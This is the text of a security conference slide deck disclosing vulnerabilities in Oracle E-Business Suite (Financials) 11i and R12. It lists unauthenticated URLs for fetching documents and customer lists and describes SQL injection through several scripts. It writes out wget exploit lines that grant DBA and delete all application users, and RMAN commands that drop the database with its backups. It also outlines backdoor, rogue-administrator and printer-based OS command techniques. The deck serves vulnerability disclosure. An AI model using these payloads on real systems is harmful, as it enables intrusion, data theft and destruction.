Vulnerabilities in Oracle Financials - Joxean
Koret
Hackproofing Oracle Financials
Vulnerabilities in Oracle E-Business Suite R12
Vulnerabilities in Oracle Financials - Joxean
Koret
What is Oracle Financials?
Is an Enterprise Resource Planing product
(ERP)
The names Oracle E-Business Suite, Oracle
Applications, Oracle Financials, etc... does refer
to the same product
Vulnerabilities in Oracle Financials - Joxean
Koret
ERP Statistics
As of 2005, SAP and Oracle Applications were
the most deployed
Vulnerabilities in Oracle Financials - Joxean
Koret
Market Share
Vulnerabilities in Oracle Financials - Joxean
Koret
Market Share
Vulnerabilities in Oracle Financials - Joxean
Koret
Market Share
Vulnerabilities in Oracle Financials - Joxean
Koret
Market Share
Vulnerabilities in Oracle Financials - Joxean
Koret
Who is using Oracle Financials?
Very large list of customers
http://www.oracle.com/customers/products/financials2.html
In short...
Militars & Governments, i.e.: North Atlantic Treaty
Organization (NATO)
Banks
Airways & Airlines
Petrochemical companies
Hospitals
...
Vulnerabilities in Oracle Financials - Joxean
Koret
Some well known customers
Marvel, Banque de France, U.S. Airways, U.S.
Navy, U.S. Army, Mitsubishi, Airtel, NH Hotels,
Canon, EMC Corporation, Flemish
Government, Fujitsu, Toshiba, Google Inc,
Unisys, U.S. Postal Service, Toyota, General
Electrics, Dubai's Government, Oracle itself,
etc...
Enough (and interesting) customers to care
about ;)
Vulnerabilities in Oracle Financials - Joxean
Koret
About the talk
What are we going to covert in this talk?
Architecture overview (Basic Concepts + Brief
introduction)
Components (11i & R12)
Design flaws
Vulnerabilities
How to own
Vulnerabilities in Oracle Financials - Joxean
Koret
Architecture Overview
Vulnerabilities in Oracle Financials - Joxean
Koret
Architecture: Attacker's point of view
Applications Server's components
Web Server, Forms Server (& Reports Server)
But Reports is not always available from internet
JSP, Servlets, CGIs and ”the” PL/SQL Gateway
PL/SQL Gateway removed in R12 due to many security
problems
Database Server's components
Data
PL/SQL software
Vulnerabilities in Oracle Financials - Joxean
Koret
Basic Concepts
Forms Server
Java Applet that communicates (via HTTP in the
latest versions) with the application server
Used to show GUIs
Reports Server
The same but only for reports
PL/SQL Gateway
A way to execute PL/SQL code directly from a
browser, like a CGI but inside the database
Vulnerabilities in Oracle Financials - Joxean
Koret
Information Gathering
Vulnerabilities in Oracle Financials - Joxean
Koret
Information Gathering
Oracle Financials 11i
http://middletier/pls/DAD/fnd_web.ping
Oracle Financials R12
PL/SQL Gateway removed, URL changed to:
http://middletier/OA_HTML/jsp/fnd/fndping.jsp
What information we get this way?
Vulnerabilities in Oracle Financials - Joxean
Koret
Information Gathered
Vulnerabilities in Oracle Financials - Joxean
Koret
Information Gathering
Install Path Disclosure
Vulnerabilities in Oracle Financials - Joxean
Koret
Install Path Disclosure
The script /OA_HTML/biserror.jsp receives a
parameter called ”DBC” (DataBase
Configuration)
Is a file in the middle-tier with information regarding
the database address, etc...
It reveals the installation path when a non-existent
DBC file is given to script
Vulnerabilities in Oracle Financials - Joxean
Koret
Installation Path Disclosure
Vulnerabilities in Oracle Financials - Joxean
Koret
Information Gathering
The information retrieval (sometimes) is vital for succesful
intrusions
Databases's SID and schema (commonly APPS)
It's also typical to host multiple Oracle Financials
instances in the same machine:
/d01/apps/r12
/d02/apps/r11
You must know the operating system to completely own
the system
Vulnerabilities in Oracle Financials - Joxean
Koret
Vulnerabilities
Vulnerabilities in Oracle Financials - Joxean
Koret
Vulnerabilities by component
Middle-tier
Oracle Forms
PL/SQL gateway (only in version 11i)
JSP
Database backend
Oracle Database
Middle-tier (again)
The Printers From Hell
Vulnerabilities in Oracle Financials - Joxean
Koret
Vulnerabilities: Cross Site Scripting
Oracle Financials is full of XSS vulnerabilities
In example, the script biserror.jsp is designed to
show an error page with a custom message
The message text can be HTML code
By design!
Vulnerabilities in Oracle Financials - Joxean
Koret
XSS in biserror.jsp
Vulnerabilities in Oracle Financials - Joxean
Koret
Vulnerabilities
Cross Site Scripting vulnerabilities can only be
usefull (when you do not have real exploits) for:
Session hijacking
Phissing
Manipulating admin panels
Etc...
However, there are many very interesting
vulnerabilities in Oracle Financials so, ignore
XSS ;)
Vulnerabilities in Oracle Financials - Joxean
Koret
Mistakes
The very first vulnerability I found in Oracle Financials 11i
was only applicable to AIX (unfortunately)
The SYSADMIN has the responsibility (role) SYSADMIN
Looking for other users with the same responsibility...
...
Vulnerabilities in Oracle Financials - Joxean
Koret
Mistakes
The very first vulnerability I found in Oracle Financials 11i
was only applicable to AIX (unfortunately)
The SYSADMIN has the responsibility (role) SYSADMIN
Looking for other users with the same responsibility...
The GUEST user appears! So any GUEST user is, in
fact, SYSADMIN!!!
Cool!
Applicable to all Oracle Apps. 11i versions for AIX
Vulnerabilities in Oracle Financials - Joxean
Koret
For the developers...
Vulnerabilities in Oracle Financials - Joxean
Koret
Oracle Forms
One of the more interesting vulnerabilities is in
the Oracle Forms Listener.
Whenever a new user wants to connect to
Oracle Forms via web, a Login Form is shown
Is a Java Applet
Vulnerabilities in Oracle Financials - Joxean
Koret
The Login Form
Vulnerabilities in Oracle Financials - Joxean
Koret
Oracle Forms Listener
But, how is the form loaded? What parameters
are given from the browser to the server if any?
Remember, it's a Java applet that communicates
with the application server
Vulnerabilities in Oracle Financials - Joxean
Koret
Oracle Forms Listener
Answer:
Vulnerabilities in Oracle Financials - Joxean
Koret
Oracle Forms Listener
So, again, we have another installation path
disclosure but, wait...
What if you're able to upload a new form to the
server, to a temporary path, in example?
The form will be executed before doing logon
Possible temporary paths:
/incoming
/tmp
Vulnerabilities in Oracle Financials - Joxean
Koret
Oracle Forms Listener
The source code of almost every form in Oracle
Financials is available:
Source code for login form is in
$FND_TOP/US/FNDSCSGN.fmb
Vulnerabilities in Oracle Financials - Joxean
Koret
Oracle Forms Source
$ cd $FND_TOP
$ pwd
/u03/oracle/prodappl/fnd/11.5.0/
$ cd forms
$ ls
E US
$ ls US/
APPTREE.fmx FNDATENT.fmx FNDCPDIA.fmx FNDCUSTM.fmx FNDFFMIS.fmx
FNDFMFUN.fmx FNDPOMPV.fmx FNDSCAUS.fmx FNDSNDSQ.fmx FNDADDSQ.fmx
FNDATFUN.fmx FNDCPDPD.fmx FNDFBMAS.fmx FNDFFMSA.fmx FNDLVMLU.fmx
FNDPOMSV.fmx FNDSCDDG.fmx TEMPLATE.fmx (...)
Vulnerabilities in Oracle Financials - Joxean
Koret
Old Vulnerabilities: PL/SQL Gateway
In the prior version (Oracle Financials 11i)
almost all the vulnerabilities I found were SQL
Injection or ”mistakes”
Thanks to the PL/SQL Gateway
I'm going to tell you about various of them
Sorry, no demo for this version :(
Vulnerabilities in Oracle Financials - Joxean
Koret
The PL/SQL Gateway
What is the PL/SQL Gateway?
Is a way to directly execute PL/SQL code in the
database via a browser
Vulnerabilities in Oracle Financials - Joxean
Koret
The PL/SQL Gateway
What is the PL/SQL Gateway?
Is a way to directly execute PL/SQL code in the
database via a browser
”Where you see a feature I see a flaw!”
What if the PL/SQL code contains
vulnerabilities?
Vulnerabilities in Oracle Financials - Joxean
Koret
The PL/SQL Gateway
Remember, the PL/SQL Gateway is a way to
directly execute PL/SQL code in the database
via a browser
”Where you see a feature I see a flaw!”
What if the PL/SQL code contains
vulnerabilities?
You're running code directly in the database
You can run any procedure granted to public
A lot of them, about thousands in total
Cool!
Vulnerabilities in Oracle Financials - Joxean
Koret
Some reported & fixed vulnerabilities
http://<target>/pls/<DAD>/ADI_display_report.
DisplayFile?P_DOCID=<doc id>
http://<target>/pls/<DAD>/ADI_BINARY_FILE.
Show?p_DocumentId=<doc id>
Download any document stored in the ERP
(contracts, etc...) without being authenticated
Just brute force the doc_id and that's all
Vulnerabilities in Oracle Financials - Joxean
Koret
PL/SQL Gateway
But, wait! I don't know the DAD?
OK, simply navigate with your browser to the following
location:
http://<target>:<port>/pls/
You will be redirected to the URL /pls/DAD/fnd_web.ping
In Oracle Apps since 11.5.10.2 you will get the message
”Unauthorized”
But, well, when accessing to the URL you were
redirected to...
Vulnerabilities in Oracle Financials - Joxean
Koret
More vulnerabilities in Apps 11i
How can I see the complete list of customers
and contacts of my adversary corporation?
Vulnerabilities in Oracle Financials - Joxean
Koret
More vulnerabilities in Apps 11i
How can I see the complete list of customers
and contacts of my adversary corporation?
Easy! The following URL is your answer:
/pls/<DAD>/ICXSUPWF.DISPLAYCONTACTS
No check for valid session, valid privileges, etc...
The complete list of customers and contacts is printed in the web page
Cool++!
Vulnerabilities in Oracle Financials - Joxean
Koret
SQL Injection
Another vulnerable package (the name says that it's surely
vulnerable)
/pls/DAD/ICX_UTIL.LOVVALUES
A LOV, in Oracle language, is a List Of Values
Typically, an SQL query to show some data
The script receives 2 cool parameters:
c_where_clause & c_js_where_clause
Guess what is the purpose of the parameters?
Cool^2
Vulnerabilities in Oracle Financials - Joxean
Koret
Returning back to ICXSUPWF.DISPLAYCONTACTS
Do you remember the package to download the
complete customer's list?
Well, this package also receives a seemingly
equal parameter:
p_where
Of course, this is one SQL's where clause
Vulnerabilities in Oracle Financials - Joxean
Koret
Sufficient SQL Injections
OK, we have sufficient ”SQL injections?” (or
design flaws?) for now but, what can I do with
them?
Well, some facts:
You're running your SQL code as the APPS user
The APPS user is the owner of the ERP's data
So you're the new owner of the data :)
Also, the APPS user has granted the DBA role
So you're also the new DBA
Vulnerabilities in Oracle Financials - Joxean
Koret
Oracle Database User APPS
Running SQL code as any DBA you can do whatever you want
as, in example:
Create a Java procedure to execute OS commands and to
connect back to you
Create a PL/SQL backdoor to make ”easier?” executing new
commands
Execute a funny OS + RMAN command:
$ rman target /
rman> sql 'shutdown abort'
rman> drop database including backups noprompt;
And kill her wife if possible
Vulnerabilities in Oracle Financials - Joxean
Koret
Oracle Financials R12
I think that I showed sufficient (old, fixed) Oracle
Apps 11i vulnerabilities
Now, it's time for Oracle Applications R12
Vulnerabilities in Oracle Financials - Joxean
Koret
Oracle Applications R12: Changes
In this version Oracle removed the PL/SQL
Gateway
No fun :(
But they ported almost all the packages to JSP
So the unique change for us is that we don't
need a DAD this time, we already know the
complete URL to access every JSP
http://<target>:<port>/OA_HTML/<yourjsp.jsp>
Vulnerabilities in Oracle Financials - Joxean
Koret
Oracle Applications R12: Changes
In this version they check in almost all JSP
scripts for a valid session, except for allowed to
GUEST applications
However, we can still get fun ;)
Vulnerabilities in Oracle Financials - Joxean
Koret
Establishing a GUEST session
To establish a GUEST session you just need to
navigate to any ”allowed to GUEST” jsp and,
automagically, a new session will be created for
you
Vulnerabilities in Oracle Financials - Joxean
Koret
Guest Sessions
When you want to do logon via the web page you're received
with a web page similar if not equal to the following one:
Vulnerabilities in Oracle Financials - Joxean
Koret
Guest Sessions
When you do logon correctly you're redirected to the
following web page:
Vulnerabilities in Oracle Financials - Joxean
Koret
Guest Sessions
If you navigate (before doing logon) directly to
this web page an exception occurs but a new
GUEST session gets created.
Vulnerabilities in Oracle Financials - Joxean
Koret
Servlet's Source Code
Vulnerabilities in Oracle Financials - Joxean
Koret
Guest Sessions
With a valid GUEST session we can, now,
access any JSP.
But some of them will check if we have the correct
privileges or simply fail because we're not
SYSADMIN, etc...
Anyway, our attack vector has significantly
increased :)
Vulnerabilities in Oracle Financials - Joxean
Koret
Oracle Financials R12
OK so... Do you remember the flaws where you
can inject any where clause in Oracle Apps 11i?
Well, Oracle always surprised me...
Vulnerabilities in Oracle Financials - Joxean
Koret
Oracle Applications R12
In this version they added a cool script called
jtfwcpnt.jsp.
It is a component of the Oracle FinancialsCRM
In Oracle words:
“A Card Paint to display cards in Smart ListSearch”
Questions to Larry Ellison, plz!
The script is completely flawed.
Vulnerabilities in Oracle Financials - Joxean
Koret
jtfwcpnt.jsp
This cool script receives one interesting
parameter:
query
Do I need to explain something else?
Vulnerabilities in Oracle Financials - Joxean
Koret
jtfwcpnt.jsp
This cool script receives one interesting
parameter:
query
Do I need to explain something else?
Let's see a very complicated exploit...
Vulnerabilities in Oracle Financials - Joxean
Koret
jtfwcnpt.jsp 0days 3xpl01ts
$ export TARGET=”http://<target>:<port>/OA_HTML”
$ wget -O - “$TARGET/OA.jsp”
"$TARGET/jtfwcpnt.jsp?query=begin%20execute%20immediate%20'
grant%20dba%20to%20mom';%20end;”
$ wget -O - “$TARGET/OA.jsp”
"$TARGET/jtfwcpnt.jsp?query=begin%20execute%20immediate%20'
delete%20from%20apps.fnd_user';%20commit;end;”
Vulnerabilities in Oracle Financials - Joxean
Koret
Creating a new SYSADMIN user
We're running code as the APPS user so,
again, we're the new owner of the data
So we can, in example, create a new SYSADMIN
like user:
Vulnerabilities in Oracle Financials - Joxean
Koret
Vulnerabilities in Oracle Financials - Joxean
Koret
Responsibilities
Running this PL/SQL code via the jtfwcpnt.jsp
script we create a new user and assign 2
responsibilities:
20420 – System Administrator (SYSADMIN)
20872 – System Administration
Vulnerabilities in Oracle Financials - Joxean
Koret
Owning by tiers
Abusing from this flaw we gained access to the
database backend
If we just want to extract some data, we're done,
delete the created user and that's all
However, if we want to continue owning all the
rest of the tiers we need to find a way to
execute code also in the middle-tier
Remember, we gained access to the database and
it will be in a different box :(
Vulnerabilities in Oracle Financials - Joxean
Koret
Gaining Access to the Middle-tiers
How can we gain access to the middle-tiers?
Checked for a flawed JSP that writes something to
disk, but nothing was found
Checked also for Runtime.getRuntime() and so on:
No luck :(
Vulnerabilities in Oracle Financials - Joxean
Koret
Gaining Access to the Middle-tiers
How can we gain access to the middle-tiers?
Checked for a flawed JSP that writes something to
disk, but nothing was found
Checked also for Runtime.getRuntime() and so on:
No luck :(
But found a funny technique:
The Printer From Hell
Vulnerabilities in Oracle Financials - Joxean
Koret
The Printers From Hell
Vulnerabilities in Oracle Financials - Joxean
Koret
The Printer From Hell
Oracle Applications Server is a web based
application
It's designed to be used by big companies
either connected from LAN or from Internet
They designed a way to print to one system
administrator specified printer from anywhere
But, how are the printers configured?
Administrator does this via the ERP or directly inserting
into the database
Vulnerabilities in Oracle Financials - Joxean
Koret
The Printer From Hell
Vulnerabilities in Oracle Financials - Joxean
Koret
The Printer From Hell
We have a ”printer coming from hell”, just print
something using the ERP or the PL/SQL
packages and you're done
Vulnerabilities in Oracle Financials - Joxean
Koret
The Printer From Hell
We have a ”printer coming from hell”, just print
something using the ERP or the PL/SQL
packages and you're done
Th3 c0mpl3t3 $y$t3m w4$ 0wN3|)
Vulnerabilities in Oracle Financials - Joxean
Koret
However...
We're running code as the ”oracle” OS level
user but I know no way to scalate to root :(
Well, if the database server is not correctly patched
we can always use the ”extjob” suid tool
Vulnerability CVE-2008-2613
But, what if the system is a Win32 box?
Don't worry! You're already running code as Local
System :)
Vulnerabilities in Oracle Financials - Joxean
Koret
● Conclussions
Vulnerabilities in Oracle Financials - Joxean
Koret
Oracle Financials R12
It's getting better in some aspects but there are plenty of
quite stupid vulnerabilities
It's OK (in my opinion) to run it in our companies as an
intranet application but you should take care opening
connectivity to Oracle Financials from Internet
IMHO...
Vulnerabilities in Oracle Financials - Joxean
Koret
Final Conclussion?
Vulnerabilities in Oracle Financials - Joxean
Koret
The End
● Thanks you folks!
Top Related